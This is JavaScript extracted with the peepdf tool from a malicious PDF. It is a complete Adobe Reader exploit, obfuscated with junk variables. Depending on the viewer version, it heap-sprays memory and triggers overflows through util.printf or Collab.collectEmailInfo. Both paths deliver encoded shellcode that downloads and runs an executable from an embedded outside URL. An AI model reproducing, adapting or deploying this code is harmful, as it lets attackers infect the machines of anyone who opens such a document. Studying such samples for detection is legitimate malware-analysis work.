// peepdf comment: Javascript code located in object 1 (version 0)

this.kukuza()

// peepdf comment: Javascript code located in object 13 (version 0)

var i = 0;
zFHYxkRYwD2 = unescape("%u5");

function fix_it(yarsp, len) {
    var xyu = "";
    var xyz = "0";
    var zFHYxD2 = unescape("%u5");
    zD2 = unescape("%u5");
    while (yarsp.length * 2 < len) {
        yarsp += yarsp;
    }
    yarsp = yarsp.substring(0, len / 2);
    return yarsp;
}

function olala() {
    var qnnax = "13";
    var wnnax = "111";
    var ennax = "11";
    var rnnax = "2";
    var tnnax = "92";
}

function gln(num, content) {
    var z = "";
    var yu = "";
    for (var i = 0; i < num; i++) {
        z += content.toString();
    }
    return z;
}
var version = app.viewerVersion;
var wi = 13334130;
zF1314453HYxwD2 = unescape("%u5");




if (version > 8) {
    var qi = 0;
    z2 = unescape("%u5");
    var wi = 13130;
    zF1313HYxwD2 = unescape("%u5");

    var addkk = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u782F%u7878%u6C67%u6D61%u756F%u2E72%u656E%u2F74%u6F74%u7370%u652F%u6578%u702E%u7068");


    var fix_it = unescape("%u0A0A%u0A0A");
    var yarsp = 20;
    var wi = 0;
    zFHYxwD2 = unescape("%u5");
    var make_hellcode = yarsp + addkk.length;
    while (fix_it.length < make_hellcode) fix_it += fix_it;
    var count2 = fix_it.substring(0, make_hellcode);
    var addr = fix_it.substring(0, fix_it.length - make_hellcode);
    while (addr.length + make_hellcode < 0x60000) addr = addr + addr + count2;
    var sc_len = new Array();
    for (overflow = 0; overflow < 1200; overflow++) {
        sc_len[overflow] = addr + addkk
    }
    var cc = 12 + gln(18, 9) + gln(276, 8);
    var ya22rsp = 20;
    var w45i = 0;
    zFHYx54wD2 = unescape("%u5");
    util.printf("%45000f", cc);
} else {
    var addkk = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u782F%u7878%u6C67%u6D61%u756F%u2E72%u656E%u2F74%u6F74%u7370%u652F%u6578%u702E%u7068");
    var mem_array = new Array();
    var cc = 0x0c0c0c0c;
    var addr = 0x400000;
    var y545arsp = 20;
    var w7667i = 0;
    zFHYxw6767D2 = unescape("%u5");
    var sc_len = addkk.length * 2;
    var len = addr - (sc_len + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = fix_it(yarsp, len);
    var count2 = (cc - 0x400000) / addr;
    var y11arsp = 20;
    var whjji = 0;
    zFHYxwlllllD2 = unescape("%u5");
    for (var count = 0; count < count2; count++) {
        mem_array[count] = yarsp + addkk;
    }
    var overflow = unescape("%u0c0c%u0c0c");
    var yaioiorsp = 20;
    var wjkji = 0;
    zFHYxwDnmnm2 = unescape("%u5");
    while (overflow.length < 44952) overflow += overflow;
    this.collabStore = Collab.collectEmailInfo({
        subj: "",
        msg: overflow
    });
}

